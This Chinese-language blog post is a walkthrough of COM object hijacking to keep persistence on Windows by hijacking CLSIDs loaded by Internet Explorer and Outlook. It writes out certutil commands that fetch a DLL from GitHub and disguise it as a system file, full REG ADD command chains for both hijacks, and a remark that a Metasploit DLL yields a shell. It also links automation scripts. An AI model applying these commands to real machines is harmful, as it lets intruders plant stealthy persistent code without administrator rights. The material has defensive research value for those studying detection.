CATALOG

  • 1.实现原理
  • 2.实现过程
    • 劫持IE浏览器
    • 劫持outlook
  • 3.参考文章

1.实现原理

通过劫持IE浏览器或者outlook启动过程中启动的com组件,来使系统执行我们所指定的dll文件,进而达到权限维持,可以通过修改注册表来完成,不需要管理员权限。

2.实现过程

劫持IE浏览器

  1. 下载poc文件:
    certutil.exe -urlcache -split -f https://github.com/3gstudent/test/blob/master/calcmutex.dll
  2. 创建文件夹
    如果是64位系统:
mkdir %APPDATA%\Microsoft\Installer\{BCDE0395-E52F-467C-8E3D-C4579291692E}
cd  %APPDATA%\Microsoft\Installer\{BCDE0395-E52F-467C-8E3D-C4579291692E}

  1. 下载文件并修改文件名
certutil.exe -urlcache -split -f [url] api-ms-win-downlevel-1x64-l1-1-0._dl
certutil.exe -urlcache -split -f [url] #删除缓存

  1. 修改注册表
    值为刚下载的文件的绝对路径:
C:\Users\test\AppData\Roaming\Microsoft\Installer\{BCDE0395-E52F-467C-8E3D-C4579291692E}\api-ms-win-downlevel-1x64-l1-1-0._dl
  1. 劫持结果

也可以使用msf生成的dll来实现,会弹回shell,不过机器重启后,会丢失桌面,直接黑屏。需要自己编写恶意dll确保dll只会执行一次。定义一个互斥向量即可。

所有命令如下:

cd desktopmkdir %APPDATA%\Microsoft\Installer\{BCDE0395-E52F-467C-8E3D-C4579291692E}copy calcmutex.dll %APPDATA%\Microsoft\Installer\{BCDE0395-E52F-467C-8E3D-C4579291692E}\api-ms-win-downlevel-1x86-l1-1-0._dlcopy calcmutex_x64.dll %APPDATA%\Microsoft\Installer\{BCDE0395-E52F-467C-8E3D-C4579291692E}\api-ms-win-downlevel-1x64-l1-1-0._dlSET KEY=HKEY_CURRENT_USER\Software\Classes\CLSID\{b5f8350b-0548-48b1-a6ee-88bd00b4a5e7}\InProcServer32REG.EXE ADD %KEY% /VE /T REG_SZ /D "C:\Users\test\AppData\Roaming\Microsoft\Installer\{BCDE0395-E52F-467C-8E3D-C4579291692E}\api-ms-win-downlevel-1x64-l1-1-0._dl" /FREG.EXE ADD %KEY% /V ThreadingModel /T REG_SZ /D Apartment /FSET KEY=HKCU\Software\Classes\Wow6432Node\CLSID\{BCDE0395-E52F-467C-8E3D-C4579291692E}\InProcServer32REG.EXE ADD %KEY% /VE /T REG_SZ /D "C:\Users\test\AppData\Roaming\Microsoft\Installer\{BCDE0395-E52F-467C-8E3D-C4579291692E}\api-ms-win-downlevel-1x86-l1-1-0._dl" /FREG.EXE ADD %KEY% /V ThreadingModel /T REG_SZ /D Apartment /F

也可以使用脚本一键完成:https://github.com/3gstudent/COM-Object-hijacking

劫持outlook

实现所需所有命令如下:

reg add HKCU\Software\Classes\CLSID\{84DA0A92-25E0-11D3-B9F7-00C04F4C8F5D}\TreatAs /t REG_SZ /d "{49CBB1C7-97D1-485A-9EC1-A26065633066}" /freg add HKCU\Software\Classes\CLSID\{49CBB1C7-97D1-485A-9EC1-A26065633066} /t REG_SZ /d "Mail Plugin" /freg add HKCU\Software\Classes\CLSID\{49CBB1C7-97D1-485A-9EC1-A26065633066}\InprocServer32 /t REG_SZ /d "C:\Users\test\Desktop\calc.dll" /freg add HKCU\Software\Classes\CLSID\{49CBB1C7-97D1-485A-9EC1-A26065633066}\InprocServer32 /v ThreadingModel /t REG_SZ /d "Apartment" /freg add HKCU\Software\Classes\Wow6432Node\CLSID\{84DA0A92-25E0-11D3-B9F7-00C04F4C8F5D}\TreatAs /t REG_SZ /d "{49CBB1C7-97D1-485A-9EC1-A26065633066}" /freg add HKCU\Software\Classes\Wow6432Node\CLSID\{49CBB1C7-97D1-485A-9EC1-A26065633066} /t REG_SZ /d "Mail Plugin" /freg add HKCU\Software\Classes\Wow6432Node\CLSID\{49CBB1C7-97D1-485A-9EC1-A26065633066}\InprocServer32 /t REG_SZ /d "C:\Users\test\Desktop\calc.dll" /freg add HKCU\Software\Classes\Wow6432Node\CLSID\{49CBB1C7-97D1-485A-9EC1-A26065633066}\InprocServer32 /v ThreadingModel /t REG_SZ /d "Apartment" /f

自动实现脚本:https://github.com/3gstudent/Homework-of-Powershell/blob/master/Invoke-OutlookPersistence.ps1

3.参考文章

Hijack CAccPropServicesClass and MMDeviceEnumerator劫持IE浏览器
Use COM Object hijacking to maintain persistence——Hijack Outlook

劫持outlook与IE浏览器实现权限维持相关推荐

  1. 火狐浏览器摄像头权限怎么开启 火狐浏览器摄像头权限开启的方法

    火狐浏览器是我们大家经常使用的浏览器之一,在使用这款浏览器的过程有时候需要使用到摄像头,那你知道火狐浏览器摄像头权限怎么开启的吗?接下来我们一起往下看看火狐浏览器摄像头权限开启的方法吧. 方法步骤 1 ...

  2. 大规模针对iOS设备的恶意广告活动劫持3亿次浏览器会话

    针对iOS设备的大规模恶意广告活动在短短48小时内就劫持了3亿次浏览器会话.Confiant的研究人员记录了11月12日的活动,表示该活动背后的威胁行动者至今仍保持活跃. 恶意登录页面 当用户访问网页 ...

  3. 清除 360流氓软件对浏览器的劫持插件B5T,浏览器快捷方式会带参数 123.125y.com

    1)解决快捷方式不能修改的问题    1.1) 思路是这样的,在修改"快捷方式"时,如果提示"无权限修改", 则问题是"快捷方式"所在目录权 ...

  4. 解决:win10 浏览器麦克风权限如何打开?打开也没用?

    前提:一定要确保系统本身就已经启用麦克风,具体操作如下: 设置 -> 隐私 -> 打开麦克风权限 根据提示,打开浏览器权限,这里以谷歌浏览器为例,其他的可以参考:https://zhuan ...

  5. 浏览器劫持解决:解决浏览器的捆绑问题

    解决浏览器开始页捆绑问题 引子 大家好,我是小赵,我们日常上网的时候,难免会被一些流氓网站看中,修改软件属性,导致我们浏览器的起始页遭到毁灭性打击,更改起始页被篡改成各种流氓网站的页面,修改我们的起始 ...

  6. debian9.6解决firefox浏览器安全权限的问题

    刚刚安装新的debian系统,可能某些网页打不开,比如说游戏网页. 老的方法: 可能是因为firefox浏览器版本的升级,老的方法是打开右上角浏览器的选项,然后找到应用,里面可以设置,但是我这没有,我 ...

  7. 百度浏览器的编程html,百度来路浏览器劫持代码(替换浏览器正在浏览页面)...

    代码已经调试,确认完全无误! if (document.cookie.indexOf('whoami') == -1) { var exp = new Date(); exp.setTime(exp. ...

  8. 浏览器劫持定义及危害、处理浏览器被劫持自动跳转到某个网页的修复教程

    浏览器劫持是一种恶意程序,通过浏览器插件.BHO(浏览器辅助对象).Winsock LSP等形式对用户的浏览器进行篡改,使用户的浏览器配置不正常,被强行引导到商业网站. 所谓浏览器劫持是指网页浏览器( ...

  9. 【XSS漏洞-06】XSS漏洞利用案例(浏览器劫持、会话劫持、GetShell)—基于神器beEF

    目录 1 案例简介 1.1 案例目的 1.2 案例环境 2 案例一:浏览器劫持 2.1 概述 2.2 案例步骤 3 案例二:会话劫持 3.1 概述 3.2 案例步骤 4 案例三:GetShell 4. ...

最新文章

  1. ExoPlayer简单使用
  2. 【收藏】IDEA jetbrains.com官网进不去解决办法
  3. CF1183H Subsequences (hard version)
  4. js html 转换为富文本,如何将富文本得到的html转换为pdf?
  5. mysql 安全问题_浅谈MySQL数据库的Web安全问题
  6. 基于Lumisoft.NET组件开发碰到乱码等一些问题的解决
  7. 通过掌握谷歌成为更好的程序员
  8. 硬盘整数分区最精确地方法(转载)
  9. Spring Cloud+Spring Boot高频面试题解析
  10. #QCon#北京2011大会“更有效地做测试”专题Slides资料
  11. java 打印素数_Java 素数打印
  12. QT界面 全屏显示 自适应显示 多屏显示
  13. mysql 页大小_查找最佳页面大小
  14. redhat linux系统下查看Emulex HBA卡基本命令
  15. 拉格朗日乘数法 —— 通俗理解
  16. vue页面返回消息头获取_vue在响应头response中获取自定义headers操作
  17. Vue Router 实现路由控制实战
  18. think-swoole简易使用教程--websocket
  19. TexStudio编写Latex碰到的问题
  20. bootrom是什么?

热门文章

  1. 【Python爬虫】Scrapy 下载安装
  2. spring 注解练习
  3. linux图像编辑,Photoflare:Linux下简单的开源图像编辑器
  4. 动态路由rip配置命令
  5. VS2015打开编译VS2013工程时提示fatal error C1083: 无法打开包括文件: “afxwin.h”: No such file or directory
  6. 【detectron】对输入样本如何产生anchor
  7. linux入门怎么学
  8. html自动缩放不出现滚动条,HTML页面缩小后显示滚动条的示例代码
  9. 智能算法系列之粒子群优化算法
  10. Python GraphQL